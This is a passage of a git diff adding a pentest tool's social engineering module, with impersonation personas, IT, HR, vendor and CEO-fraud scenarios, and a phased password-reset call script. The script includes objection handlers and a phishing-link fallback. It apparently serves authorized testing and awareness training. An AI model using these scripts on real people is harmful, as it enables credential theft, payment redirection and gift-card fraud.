+      "I wanted to follow up on this matter",
+      "I need to verify some information",
+      "This is a routine follow-up",
+    ]
+  }
+
+  // ========== Persona Customization ==========
+
+  /**
+   * Customize persona for specific target organization.
+   */
+  export function customizeForOrganization(
+    persona: Persona,
+    targetOrg: string
+  ): Persona {
+    return {
+      ...persona,
+      id: SocEngStorage.createPersonaId(),
+      organization: targetOrg,
+      email: generateEmail(persona.name, targetOrg),
+      talkingPoints: persona.talkingPoints.map((tp) =>
+        tp.replace(/\[.*?\]/g, targetOrg)
+      ),
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Clone persona with new name.
+   */
+  export function cloneWithNewIdentity(persona: Persona): Persona {
+    const name = generateName()
+    return {
+      ...persona,
+      id: SocEngStorage.createPersonaId(),
+      name,
+      email: generateEmail(name, persona.organization),
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Response Generation ==========
+
+  /**
+   * Generate response based on persona traits.
+   */
+  export function generateResponse(
+    persona: Persona,
+    situation: "greeting" | "objection" | "closing" | "followup"
+  ): string {
+    const { tone, urgency } = persona.traits
+
+    const responses: Record<string, Record<string, string[]>> = {
+      greeting: {
+        formal: [
+          `Good morning/afternoon, this is ${persona.name} from ${persona.organization}.`,
+          `Hello, my name is ${persona.name} and I'm calling from ${persona.organization}.`,
+        ],
+        casual: [
+          `Hi there! This is ${persona.name} from ${persona.organization}.`,
+          `Hey, ${persona.name} here from ${persona.organization}.`,
+        ],
+        friendly: [
+          `Hi! I'm ${persona.name} from ${persona.organization}. How are you today?`,
+          `Hello! This is ${persona.name}. I hope I'm not catching you at a bad time.`,
+        ],
+        authoritative: [
+          `This is ${persona.name} from ${persona.organization}. I need to speak with you about an important matter.`,
+          `${persona.name}, ${persona.organization}. I have an urgent matter to discuss.`,
+        ],
+      },
+      objection: {
+        formal: [
+          "I understand your concern. Let me explain further.",
+          "I appreciate you raising that. Here's some additional context.",
+        ],
+        casual: [
+          "I totally get it. Let me clarify.",
+          "No worries, I understand. Here's the thing...",
+        ],
+        friendly: [
+          "I completely understand your hesitation. Let me help put your mind at ease.",
+          "That's a valid concern. Let me address that for you.",
+        ],
+        authoritative: [
+          "I understand, but this is a time-sensitive matter.",
+          "This is important. Let me explain why we need to proceed.",
+        ],
+      },
+      closing: {
+        formal: [
+          "Thank you for your time. I'll follow up as discussed.",
+          "I appreciate your assistance with this matter.",
+        ],
+        casual: [
+          "Thanks for your help! I'll be in touch.",
+          "Appreciate it! Talk soon.",
+        ],
+        friendly: [
+          "Thank you so much for your help! Have a great day!",
+          "I really appreciate your time. Take care!",
+        ],
+        authoritative: [
+          "I expect this to be resolved by [time]. Thank you.",
+          "Please proceed as discussed. Thank you for your prompt attention.",
+        ],
+      },
+      followup: {
+        formal: [
+          "I'm following up on our previous conversation.",
+          "As discussed, I'm reaching out to confirm the next steps.",
+        ],
+        casual: [
+          "Hey, just wanted to follow up on what we talked about.",
+          "Circling back on our earlier conversation.",
+        ],
+        friendly: [
+          "Hi again! I wanted to check in and see how things are going.",
+          "Following up as promised! How did everything go?",
+        ],
+        authoritative: [
+          "I'm following up as this matter requires immediate attention.",
+          "This is a follow-up regarding the urgent matter we discussed.",
+        ],
+      },
+    }
+
+    const options = responses[situation][tone]
+    return options[Math.floor(Math.random() * options.length)]
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format persona list for display.
+   */
+  export function formatPersonaList(): string {
+    const lines: string[] = []
+
+    lines.push("Pretexting Personas")
+    lines.push("=".repeat(50))
+
+    for (const persona of ALL_PERSONAS) {
+      lines.push("")
+      lines.push(`👤 ${persona.name}`)
+      lines.push(`   Role: ${persona.role}`)
+      lines.push(`   Organization: ${persona.organization}`)
+      lines.push(`   Tone: ${persona.traits.tone} | Urgency: ${persona.traits.urgency}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format persona details.
+   */
+  export function formatPersonaDetails(persona: Persona): string {
+    const lines: string[] = []
+
+    lines.push(`Persona: ${persona.name}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Role: ${persona.role}`)
+    lines.push(`Organization: ${persona.organization}`)
+    if (persona.department) {
+      lines.push(`Department: ${persona.department}`)
+    }
+    if (persona.email) {
+      lines.push(`Email: ${persona.email}`)
+    }
+    lines.push("")
+    lines.push("Backstory:")
+    lines.push(`  ${persona.backstory}`)
+    lines.push("")
+    lines.push("Personality:")
+    lines.push(`  Tone: ${persona.traits.tone}`)
+    lines.push(`  Urgency: ${persona.traits.urgency}`)
+    lines.push(`  Helpfulness: ${persona.traits.helpfulness}`)
+    lines.push("")
+    lines.push("Expertise:")
+    for (const exp of persona.expertise) {
+      lines.push(`  • ${exp}`)
+    }
+    lines.push("")
+    lines.push("Key Vocabulary:")
+    lines.push(`  ${persona.vocabulary.join(", ")}`)
+    lines.push("")
+    lines.push("Talking Points:")
+    for (const point of persona.talkingPoints) {
+      lines.push(`  • "${point}"`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/pretexting/scenarios.ts b/packages/opencode/src/pentest/soceng/pretexting/scenarios.ts
new file mode 100644
index 00000000000..5fd43a70f27
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/pretexting/scenarios.ts
@@ -0,0 +1,610 @@
+/**
+ * @fileoverview Pretexting Scenarios
+ *
+ * Pre-built social engineering scenarios for various pretexts.
+ *
+ * @module pentest/soceng/pretexting/scenarios
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+
+/**
+ * Pretexting scenarios namespace.
+ */
+export namespace PretextingScenarios {
+  // ========== Scenario Categories ==========
+
+  /**
+   * Scenario category.
+   */
+  export interface ScenarioCategory {
+    id: string
+    name: string
+    description: string
+    difficulty: "beginner" | "intermediate" | "advanced"
+    scenarios: ScenarioDefinition[]
+  }
+
+  /**
+   * Scenario definition.
+   */
+  export interface ScenarioDefinition {
+    id: string
+    name: string
+    description: string
+    pretext: string
+    objectives: string[]
+    requiredInfo: string[]
+    suggestedPersona: string
+    openingLines: string[]
+    keyPhrases: string[]
+    fallbackResponses: string[]
+    redFlags: string[]
+    successIndicators: string[]
+    trainingPoints: string[]
+  }
+
+  // ========== IT Support Scenarios ==========
+
+  export const IT_SUPPORT_SCENARIOS: ScenarioCategory = {
+    id: "it-support",
+    name: "IT Support",
+    description: "Scenarios impersonating IT help desk and support staff",
+    difficulty: "beginner",
+    scenarios: [
+      {
+        id: "it-password-reset",
+        name: "Password Reset Assistance",
+        description: "IT support calling to assist with password issues",
+        pretext: "IT help desk following up on a reported password issue",
+        objectives: [
+          "Obtain current password",
+          "Gather security question answers",
+          "Get employee to visit malicious link",
+        ],
+        requiredInfo: [
+          "Target's name",
+          "Department",
+          "Recent IT tickets (if available)",
+        ],
+        suggestedPersona: "IT Help Desk Technician",
+        openingLines: [
+          "Hi, this is [Name] from IT Support. I'm calling about a password reset request we received for your account.",
+          "Hello, I'm with the IT help desk. We noticed some unusual activity on your account and need to verify a few things.",
+          "Good morning, this is [Name] from technical support. I'm following up on a ticket about email access issues.",
+        ],
+        keyPhrases: [
+          "verify your identity",
+          "security protocol",
+          "account protection",
+          "recent system upgrade",
+          "ticket number",
+          "routine maintenance",
+        ],
+        fallbackResponses: [
+          "I understand your concern. Let me verify - I can see your ticket was submitted at [time]. Does that match your records?",
+          "For security, I can't tell you your password, but I can help reset it if you verify some details.",
+          "I can have my supervisor call you back if you'd prefer. What number should we use?",
+        ],
+        redFlags: [
+          "Target asks to call back through main number",
+          "Target requests supervisor verification",
+          "Target mentions security training",
+          "Target asks for ticket number verification",
+        ],
+        successIndicators: [
+          "Target provides password or hints",
+          "Target clicks on provided link",
+          "Target provides security answers",
+          "Target agrees to remote access",
+        ],
+        trainingPoints: [
+          "IT never asks for your password over the phone",
+          "Always verify by calling back through official IT numbers",
+          "Request ticket number and verify independently",
+          "Report suspicious calls to security",
+        ],
+      },
+      {
+        id: "it-software-install",
+        name: "Required Software Installation",
+        description: "IT requiring installation of 'security update'",
+        pretext: "IT department mandating critical security software",
+        objectives: [
+          "Get target to download and run file",
+          "Obtain admin credentials",
+          "Establish remote access",
+        ],
+        requiredInfo: [
+          "Target's name",
+          "Computer name or asset tag",
+          "Department",
+        ],
+        suggestedPersona: "IT Security Specialist",
+        openingLines: [
+          "Hi [Name], this is [Name] from IT Security. We're rolling out a critical security patch and need to install it on your machine.",
+          "Hello, I'm with the IT infrastructure team. Your workstation was flagged for a required security update.",
+          "Good afternoon, this is IT support. We detected that your computer is missing an important security component.",
+        ],
+        keyPhrases: [
+          "mandatory update",
+          "security vulnerability",
+          "compliance requirement",
+          "IT policy",
+          "network access",
+          "remote session",
+        ],
+        fallbackResponses: [
+          "I understand you're busy. This should only take 5 minutes and it's required for network access.",
+          "I can send you the link and walk you through it, or I can do it remotely if you grant access.",
+          "This comes from senior IT leadership. I can CC you on the directive if that helps.",
+        ],
+        redFlags: [
+          "Target refuses to install anything",
+          "Target wants to verify with IT directly",
+          "Target asks about change management process",
+        ],
+        successIndicators: [
+          "Target downloads and runs file",
+          "Target provides admin credentials",
+          "Target enables remote access",
+        ],
+        trainingPoints: [
+          "Software updates come through official channels",
+          "Never run programs from unknown sources",
+          "Verify with IT through known contact methods",
+          "Check with manager before installing software",
+        ],
+      },
+    ],
+  }
+
+  // ========== HR Scenarios ==========
+
+  export const HR_SCENARIOS: ScenarioCategory = {
+    id: "hr",
+    name: "Human Resources",
+    description: "Scenarios impersonating HR personnel",
+    difficulty: "intermediate",
+    scenarios: [
+      {
+        id: "hr-benefits-update",
+        name: "Benefits Enrollment Urgent",
+        description: "HR calling about urgent benefits deadline",
+        pretext: "HR representative helping with benefits enrollment",
+        objectives: [
+          "Gather personal information",
+          "Obtain login credentials",
+          "Get SSN or financial details",
+        ],
+        requiredInfo: [
+          "Target's name",
+          "Employment status",
+          "Benefits eligibility",
+        ],
+        suggestedPersona: "HR Benefits Coordinator",
+        openingLines: [
+          "Hi [Name], this is [Name] from HR Benefits. I'm reaching out because your benefits enrollment is incomplete and the deadline is today.",
+          "Hello, I'm calling from Human Resources. We noticed your benefits elections haven't been submitted yet.",
+          "Good morning, this is the benefits team. We need to verify some information before we can process your enrollment.",
+        ],
+        keyPhrases: [
+          "enrollment deadline",
+          "benefits portal",
+          "coverage gap",
+          "open enrollment",
+          "verify your information",
+          "dependent verification",
+        ],
+        fallbackResponses: [
+          "I understand you may have already done this. Let me just verify we have your current information on file.",
+          "The system may not have updated yet. Can you confirm when you submitted?",
+          "I can extend the deadline for you if you complete this verification now.",
+        ],
+        redFlags: [
+          "Target wants to call HR directly",
+          "Target knows benefits enrollment is complete",
+          "Target asks specific HR policy questions",
+        ],
+        successIndicators: [
+          "Target provides personal information",
+          "Target shares login credentials",
+          "Target visits phishing link",
+        ],
+        trainingPoints: [
+          "HR communications come through official channels",
+          "Never share SSN or financial info over phone",
+          "Verify by calling HR directly",
+          "Benefits portals have official URLs",
+        ],
+      },
+      {
+        id: "hr-survey",
+        name: "Employee Satisfaction Survey",
+        description: "HR conducting urgent employee survey",
+        pretext: "HR gathering employee feedback via survey",
+        objectives: [
+          "Gather organizational intelligence",
+          "Obtain credentials for survey portal",
+          "Map organizational structure",
+        ],
+        requiredInfo: [
+          "Target's name",
+          "Department",
+          "Manager name",
+        ],
+        suggestedPersona: "HR Research Analyst",
+        openingLines: [
+          "Hi [Name], this is [Name] from HR. We're conducting a confidential employee satisfaction survey and your input is valuable.",
+          "Hello, I'm with the HR analytics team. You were selected to participate in a quick employee feedback session.",
+          "Good afternoon, this is Human Resources. We're doing a brief survey about workplace improvements.",
+        ],
+        keyPhrases: [
+          "confidential",
+          "anonymous feedback",
+          "selected participants",
+          "leadership initiative",
+          "quick survey",
+          "valuable input",
+        ],
+        fallbackResponses: [
+          "This is completely anonymous. Your name won't be attached to any responses.",
+          "This was requested by senior leadership to improve workplace conditions.",
+          "I can send you the link to complete at your convenience if you prefer.",
+        ],
+        redFlags: [
+          "Target is suspicious of phone surveys",
+          "Target asks to verify with HR",
+          "Target mentions official survey tools",
+        ],
+        successIndicators: [
+          "Target answers questions openly",
+          "Target provides organizational information",
+          "Target clicks survey link",
+        ],
+        trainingPoints: [
+          "Legitimate surveys use official platforms",
+          "Verify survey authenticity with HR",
+          "Be cautious about organizational information",
+          "Phone surveys requesting logins are suspicious",
+        ],
+      },
+    ],
+  }
+
+  // ========== Vendor Scenarios ==========
+
+  export const VENDOR_SCENARIOS: ScenarioCategory = {
+    id: "vendor",
+    name: "Vendor/Supplier",
+    description: "Scenarios impersonating external vendors",
+    difficulty: "intermediate",
+    scenarios: [
+      {
+        id: "vendor-payment-update",
+        name: "Payment Information Update",
+        description: "Vendor requesting payment detail changes",
+        pretext: "Vendor updating banking information for payments",
+        objectives: [
+          "Redirect vendor payments",
+          "Gather payment process information",
+          "Identify accounts payable contacts",
+        ],
+        requiredInfo: [
+          "Actual vendor relationship",
+          "Payment schedule",
+          "AP contact names",
+        ],
+        suggestedPersona: "Vendor Account Manager",
+        openingLines: [
+          "Hi, this is [Name] from [Vendor]. I'm calling to update our banking information for future payments.",
+          "Hello, I'm with [Vendor]'s accounts receivable. We're changing banks and need to update your payment file.",
+          "Good morning, this is [Name] at [Vendor]. Our company has changed our payment processing and I need to provide new details.",
+        ],
+        keyPhrases: [
+          "banking update",
+          "payment processing",
+          "ACH transfer",
+          "wire instructions",
+          "accounts receivable",
+          "next payment",
+        ],
+        fallbackResponses: [
+          "I understand you need verification. I can send official documentation on our letterhead.",
+          "This is time-sensitive as your next payment is due soon.",
+          "I can have your usual contact, [Name], call to confirm if needed.",
+        ],
+        redFlags: [
+          "Target requires verification callback",
+          "Target asks for existing contact name",
+          "Target mentions vendor verification process",
+        ],
+        successIndicators: [
+          "Target agrees to update payment info",
+          "Target provides AP process details",
+          "Target shares contact information",
+        ],
+        trainingPoints: [
+          "Verify vendor payment changes through known contacts",
+          "Always call back using established vendor numbers",
+          "Banking changes require formal documentation",
+          "Report suspicious vendor requests to management",
+        ],
+      },
+    ],
+  }
+
+  // ========== Executive Scenarios ==========
+
+  export const EXECUTIVE_SCENARIOS: ScenarioCategory = {
+    id: "executive",
+    name: "Executive Impersonation",
+    description: "CEO fraud and executive impersonation scenarios",
+    difficulty: "advanced",
+    scenarios: [
+      {
+        id: "exec-urgent-transfer",
+        name: "CEO Urgent Wire Transfer",
+        description: "CEO requesting urgent wire transfer",
+        pretext: "CEO in meeting needing urgent financial assistance",
+        objectives: [
+          "Initiate wire transfer",
+          "Bypass normal approval processes",
+          "Obtain financial system access",
+        ],
+        requiredInfo: [
+          "CEO name and communication style",
+          "Target's role and authority",
+          "Financial approval processes",
+        ],
+        suggestedPersona: "CEO/Executive",
+        openingLines: [
+          "[Name], I'm in a critical meeting and need your help with something urgent. Can you talk?",
+          "Hi [Name], it's [CEO]. I need a favor - this is time-sensitive.",
+          "[Name], I'm reaching out because I trust your discretion. I need help with a confidential matter.",
+        ],
+        keyPhrases: [
+          "confidential",
+          "time-sensitive",
+          "urgent matter",
+          "I'm in a meeting",
+          "trust your discretion",
+          "don't discuss",
+        ],
+        fallbackResponses: [
+          "I understand this is unusual. I'll explain everything once the deal closes.",
+          "I need you to trust me on this. I'll authorize it properly afterward.",
+          "This needs to happen before [time]. Can you make it work?",
+        ],
+        redFlags: [
+          "Target insists on verification",
+          "Target mentions dual approval",
+          "Target wants to call executive directly",
+        ],
+        successIndicators: [
+          "Target agrees to initiate transfer",
+          "Target bypasses normal process",
+          "Target provides financial details",
+        ],
+        trainingPoints: [
+          "Always verify unusual requests in person or via known number",
+          "Executives don't ask to bypass financial controls",
+          "Urgency and secrecy are major red flags",
+          "Report BEC attempts immediately",
+        ],
+      },
+      {
+        id: "exec-gift-card",
+        name: "Executive Gift Card Request",
+        description: "Executive asking for gift cards",
+        pretext: "Executive needing gift cards for client/employee appreciation",
+        objectives: [
+          "Obtain gift cards",
+          "Get gift card codes",
+          "Test target's susceptibility",
+        ],
+        requiredInfo: [
+          "Executive name",
+          "Target's purchasing authority",
+          "Company gift card policies",
+        ],
+        suggestedPersona: "Executive",
+        openingLines: [
+          "Hi [Name], I need your help with something. I want to surprise a client with gift cards but I'm stuck in meetings.",
+          "[Name], can you do me a quick favor? I need gift cards for employee appreciation.",
+          "Hey, this is [Exec]. I need gift cards urgently for a client meeting today.",
+        ],
+        keyPhrases: [
+          "client appreciation",
+          "employee recognition",
+          "scratch off codes",
+          "take a photo",
+          "send me the codes",
+          "I'll reimburse you",
+        ],
+        fallbackResponses: [
+          "I know this is unusual but I really need this today.",
+          "Just send me photos of the cards. I'll handle everything else.",
+          "Use your corporate card. I'll approve the expense.",
+        ],
+        redFlags: [
+          "Target questions the request",
+          "Target wants to deliver cards in person",
+          "Target involves others in the request",
+        ],
+        successIndicators: [
+          "Target purchases gift cards",
+          "Target sends card codes/photos",
+          "Target keeps request confidential",
+        ],
+        trainingPoints: [
+          "Gift card requests via email/text are almost always scams",
+          "Executives don't ask for gift card codes",
+          "Verify any unusual financial request in person",
+          "Report gift card scams to IT security",
+        ],
+      },
+    ],
+  }
+
+  // ========== All Categories ==========
+
+  export const ALL_CATEGORIES: ScenarioCategory[] = [
+    IT_SUPPORT_SCENARIOS,
+    HR_SCENARIOS,
+    VENDOR_SCENARIOS,
+    EXECUTIVE_SCENARIOS,
+  ]
+
+  // ========== Scenario Operations ==========
+
+  /**
+   * Get all categories.
+   */
+  export function getCategories(): ScenarioCategory[] {
+    return ALL_CATEGORIES
+  }
+
+  /**
+   * Get category by ID.
+   */
+  export function getCategory(categoryId: string): ScenarioCategory | undefined {
+    return ALL_CATEGORIES.find((c) => c.id === categoryId)
+  }
+
+  /**
+   * Get scenario by ID.
+   */
+  export function getScenario(scenarioId: string): ScenarioDefinition | undefined {
+    for (const category of ALL_CATEGORIES) {
+      const scenario = category.scenarios.find((s) => s.id === scenarioId)
+      if (scenario) return scenario
+    }
+    return undefined
+  }
+
+  /**
+   * Get scenarios by difficulty.
+   */
+  export function getByDifficulty(
+    level: "beginner" | "intermediate" | "advanced"
+  ): ScenarioDefinition[] {
+    const results: ScenarioDefinition[] = []
+    for (const category of ALL_CATEGORIES) {
+      if (category.difficulty === level) {
+        results.push(...category.scenarios)
+      }
+    }
+    return results
+  }
+
+  /**
+   * Search scenarios.
+   */
+  export function searchScenarios(keyword: string): ScenarioDefinition[] {
+    const lower = keyword.toLowerCase()
+    const results: ScenarioDefinition[] = []
+
+    for (const category of ALL_CATEGORIES) {
+      for (const scenario of category.scenarios) {
+        if (
+          scenario.name.toLowerCase().includes(lower) ||
+          scenario.pretext.toLowerCase().includes(lower) ||
+          scenario.description.toLowerCase().includes(lower)
+        ) {
+          results.push(scenario)
+        }
+      }
+    }
+
+    return results
+  }
+
+  // ========== Pretext Model Conversion ==========
+
+  /**
+   * Convert scenario to pretext record.
+   */
+  export function toPretext(scenario: ScenarioDefinition): SocEngTypes.Pretext {
+    return {
+      id: SocEngStorage.createPretextId(),
+      name: scenario.name,
+      category: scenario.id.split("-")[0],
+      description: scenario.pretext,
+      script: scenario.openingLines.join("\n\n---\n\n"),
+      objectives: scenario.objectives,
+      requiredInfo: scenario.requiredInfo,
+      persona: scenario.suggestedPersona,
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format scenario list for display.
+   */
+  export function formatScenarioList(): string {
+    const lines: string[] = []
+
+    lines.push("Pretexting Scenarios")
+    lines.push("=".repeat(50))
+
+    for (const category of ALL_CATEGORIES) {
+      lines.push("")
+      lines.push(`📁 ${category.name} (${category.difficulty})`)
+      lines.push(`   ${category.description}`)
+
+      for (const scenario of category.scenarios) {
+        lines.push(`   • ${scenario.id}: ${scenario.name}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format scenario details for display.
+   */
+  export function formatScenarioDetails(scenario: ScenarioDefinition): string {
+    const lines: string[] = []
+
+    lines.push(`Scenario: ${scenario.name}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Pretext: ${scenario.pretext}`)
+    lines.push("")
+    lines.push("Objectives:")
+    for (const obj of scenario.objectives) {
+      lines.push(`  • ${obj}`)
+    }
+    lines.push("")
+    lines.push("Required Information:")
+    for (const info of scenario.requiredInfo) {
+      lines.push(`  • ${info}`)
+    }
+    lines.push("")
+    lines.push(`Suggested Persona: ${scenario.suggestedPersona}`)
+    lines.push("")
+    lines.push("Opening Lines:")
+    for (const line of scenario.openingLines) {
+      lines.push(`  "${line}"`)
+    }
+    lines.push("")
+    lines.push("Key Phrases:")
+    lines.push(`  ${scenario.keyPhrases.join(", ")}`)
+    lines.push("")
+    lines.push("Red Flags (target is suspicious):")
+    for (const flag of scenario.redFlags) {
+      lines.push(`  ⚠️ ${flag}`)
+    }
+    lines.push("")
+    lines.push("Training Points:")
+    for (const point of scenario.trainingPoints) {
+      lines.push(`  ✓ ${point}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/pretexting/scripts.ts b/packages/opencode/src/pentest/soceng/pretexting/scripts.ts
new file mode 100644
index 00000000000..56cd876f54f
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/pretexting/scripts.ts
@@ -0,0 +1,704 @@
+/**
+ * @fileoverview Pretexting Scripts
+ *
+ * Call scripts and conversation flow management for social engineering.
+ *
+ * @module pentest/soceng/pretexting/scripts
+ */
+
+import { SocEngStorage } from "../storage"
+import { PretextingPersonas } from "./personas"
+
+/**
+ * Pretexting scripts namespace.
+ */
+export namespace PretextingScripts {
+  // ========== Script Types ==========
+
+  /**
+   * Call script definition.
+   */
+  export interface CallScript {
+    id: string
+    name: string
+    description: string
+    persona: string
+    objective: string
+    phases: ScriptPhase[]
+    objectionHandlers: ObjectionHandler[]
+    successCriteria: string[]
+    notes: string[]
+    createdAt: number
+  }
+
+  /**
+   * Script phase.
+   */
+  export interface ScriptPhase {
+    name: string
+    objective: string
+    dialogue: DialogueLine[]
+    transitions: PhaseTransition[]
+    duration: string
+  }
+
+  /**
+   * Dialogue line.
+   */
+  export interface DialogueLine {
+    speaker: "caller" | "target"
+    type: "statement" | "question" | "response" | "instruction"
+    content: string
+    alternatives?: string[]
+    notes?: string
+  }
+
+  /**
+   * Phase transition.
+   */
+  export interface PhaseTransition {
+    condition: string
+    nextPhase: string
+    fallbackPhrase?: string
+  }
+
+  /**
+   * Objection handler.
+   */
+  export interface ObjectionHandler {
+    objection: string
+    responses: string[]
+    escalateTo?: string
+  }
+
+  // ========== Built-in Scripts ==========
+
+  /**
+   * IT Password Reset Script.
+   */
+  export const IT_PASSWORD_RESET_SCRIPT: CallScript = {
+    id: "script-it-password-reset",
+    name: "IT Password Reset Call",
+    description: "Script for impersonating IT support during password reset pretext",
+    persona: "it-helpdesk",
+    objective: "Obtain credentials or get target to visit malicious link",
+    phases: [
+      {
+        name: "Introduction",
+        objective: "Establish credibility as IT support",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Hi, this is [Name] from IT Support. Am I speaking with [Target Name]?",
+            alternatives: [
+              "Hello, [Name] here from the IT Help Desk. Is this [Target Name]?",
+              "Good [morning/afternoon], IT Support calling. May I speak with [Target Name]?",
+            ],
+          },
+          {
+            speaker: "target",
+            type: "response",
+            content: "[Confirms identity]",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Great! I'm calling about a ticket we received regarding your account. We noticed some unusual activity and wanted to make sure everything is okay.",
+            notes: "Create mild concern without alarm",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target confirms identity",
+            nextPhase: "Problem Statement",
+          },
+          {
+            condition: "Target questions legitimacy",
+            nextPhase: "Verification",
+            fallbackPhrase: "I completely understand being careful. Let me verify - I can see your ticket was submitted at [time] and shows your workstation as [computer name].",
+          },
+        ],
+        duration: "30-60 seconds",
+      },
+      {
+        name: "Problem Statement",
+        objective: "Explain the issue requiring action",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "We detected that someone may have tried to access your account from an unrecognized location. For your security, we need to verify your identity and reset your password.",
+          },
+          {
+            speaker: "target",
+            type: "response",
+            content: "[Reacts with concern]",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Don't worry, we caught it in time. I just need to walk you through a quick verification process to secure your account.",
+            notes: "Reassure while maintaining urgency",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target agrees to proceed",
+            nextPhase: "Information Gathering",
+          },
+          {
+            condition: "Target is skeptical",
+            nextPhase: "Build Trust",
+          },
+        ],
+        duration: "1-2 minutes",
+      },
+      {
+        name: "Build Trust",
+        objective: "Establish additional credibility if needed",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "I understand your caution - that's actually good security awareness. Let me give you some details that should help verify this is legitimate.",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "I can see you're in the [Department] department, your employee ID ends in [last 2 digits], and your manager is [Manager Name]. Does that match?",
+            notes: "Use OSINT-gathered information",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target is reassured",
+            nextPhase: "Information Gathering",
+          },
+          {
+            condition: "Target still skeptical",
+            nextPhase: "Graceful Exit",
+          },
+        ],
+        duration: "1-2 minutes",
+      },
+      {
+        name: "Information Gathering",
+        objective: "Obtain credentials or get action",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "question",
+            content: "First, I need to verify your current password to make sure you're the account owner. What password are you currently using?",
+            alternatives: [
+              "To reset your password, I'll need your current one for verification. What is it?",
+            ],
+            notes: "Direct credential request - may fail",
+          },
+          {
+            speaker: "target",
+            type: "response",
+            content: "[May refuse or comply]",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Actually, for security reasons, let me send you a link to our secure password reset portal instead. Can you check your email?",
+            notes: "Fallback to phishing link if direct request fails",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target provides password",
+            nextPhase: "Closing Success",
+          },
+          {
+            condition: "Target refuses password",
+            nextPhase: "Link Alternative",
+          },
+        ],
+        duration: "2-3 minutes",
+      },
+      {
+        name: "Link Alternative",
+        objective: "Get target to click phishing link",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "That's completely understandable. I'll send you a secure link to our password reset portal. You should receive an email from IT Security in the next few seconds.",
+          },
+          {
+            speaker: "caller",
+            type: "question",
+            content: "Do you see the email? It should be from it-security@[domain].",
+          },
+          {
+            speaker: "caller",
+            type: "instruction",
+            content: "Great, please click on the 'Reset Password' button and follow the prompts. I'll stay on the line to make sure it works.",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target clicks link",
+            nextPhase: "Closing Success",
+          },
+          {
+            condition: "Target refuses",
+            nextPhase: "Graceful Exit",
+          },
+        ],
+        duration: "2-3 minutes",
+      },
+      {
+        name: "Closing Success",
+        objective: "End call naturally after success",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Your account should be secure now. You'll receive a confirmation email shortly. Is there anything else I can help you with today?",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Great. If you notice any other unusual activity, don't hesitate to call the help desk. Have a great day!",
+          },
+        ],
+        transitions: [],
+        duration: "30 seconds",
+      },
+      {
+        name: "Graceful Exit",
+        objective: "End call without raising suspicion",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "I understand. In that case, you can always reset your password directly through the company portal. Would you like me to email you the direct link instead?",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "No problem at all. Your security awareness is exactly what we look for. Have a great day!",
+          },
+        ],
+        transitions: [],
+        duration: "30 seconds",
+      },
+    ],
+    objectionHandlers: [
+      {
+        objection: "I'll call IT back myself",
+        responses: [
+          "Of course, that's a smart approach. The main help desk number is [number]. Ask for ticket [fake number].",
+          "Absolutely, I encourage that. However, this is time-sensitive - your account may be locked within the hour.",
+        ],
+      },
+      {
+        objection: "How do I know you're really from IT?",
+        responses: [
+          "Great question. I can tell you your desk is on the [floor] floor, near [landmark]. I also have your badge number ending in [digits].",
+          "I can send you an email from my official IT account right now. What's the best email to reach you?",
+        ],
+      },
+      {
+        objection: "I never submitted a ticket",
+        responses: [
+          "The ticket was auto-generated by our security monitoring system when it detected the unusual login attempt.",
+          "These tickets are created automatically when our systems detect potential compromises. You didn't need to submit it manually.",
+        ],
+      },
+      {
+        objection: "I need to check with my manager",
+        responses: [
+          "Of course. This is time-sensitive though - your account could be locked within the hour. I can wait while you check.",
+          "I understand. Would it help if I sent an email to both you and your manager explaining the situation?",
+        ],
+      },
+    ],
+    successCriteria: [
+      "Obtained current password",
+      "Target clicked phishing link",
+      "Target provided security question answers",
+      "Target enabled remote access",
+    ],
+    notes: [
+      "Adjust urgency based on target's role - executives may need more urgency, technical staff need more details",
+      "Have OSINT ready: manager name, department, employee ID pattern, office location",
+      "If target becomes hostile, exit gracefully to avoid reports",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * HR Benefits Script.
+   */
+  export const HR_BENEFITS_SCRIPT: CallScript = {
+    id: "script-hr-benefits",
+    name: "HR Benefits Enrollment Call",
+    description: "Script for impersonating HR during benefits enrollment",
+    persona: "hr-benefits",
+    objective: "Gather personal information or credentials through benefits pretext",
+    phases: [
+      {
+        name: "Introduction",
+        objective: "Establish HR identity and create urgency",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Hi [Target Name], this is [Name] from Human Resources, specifically the Benefits team. Do you have a few minutes to discuss your benefits enrollment?",
+          },
+          {
+            speaker: "target",
+            type: "response",
+            content: "[Responds]",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
